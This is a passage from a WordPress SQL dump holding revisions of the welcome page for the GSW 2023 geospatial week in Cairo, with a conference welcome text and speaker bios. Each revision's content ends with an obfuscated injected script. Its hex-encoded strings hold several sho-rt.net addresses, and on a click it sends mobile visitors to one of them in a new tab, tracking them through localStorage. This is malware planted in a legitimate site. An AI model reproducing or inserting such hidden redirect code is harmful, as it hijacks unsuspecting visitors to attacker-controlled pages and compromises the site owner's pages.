orEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 11:01:13','2023-06-03 11:01:13','',3233,'https://gsw2023.com/?p=4619',0,'revision','',0),
(4620,1,'2023-06-03 11:01:36','2023-06-03 11:01:36','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685790041643{margin-top: -120px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2270\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png\" alt=\"\" width=\"118\" height=\"117\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-4613 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"94\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-2272 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p>&nbsp;</p>\n</section>\n</div>\n</div>\n</div>\n</div>\n</div>\n<footer id=\"footer\" class=\"footer solid-bg footer-outline-decoration full-width empty-footer\">\n<div id=\"bottom-bar\" class=\"solid-bg logo-left\" role=\"contentinfo\">\n<div class=\"wf-wrap\">\n<div class=\"wf-container-bottom\"></div>\n</div>\n</div>\n</footer>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 11:01:36','2023-06-03 11:01:36','',3233,'https://gsw2023.com/?p=4620',0,'revision','',0),
(4621,1,'2023-06-03 11:02:11','2023-06-03 11:02:11','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685790041643{margin-top: -120px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of 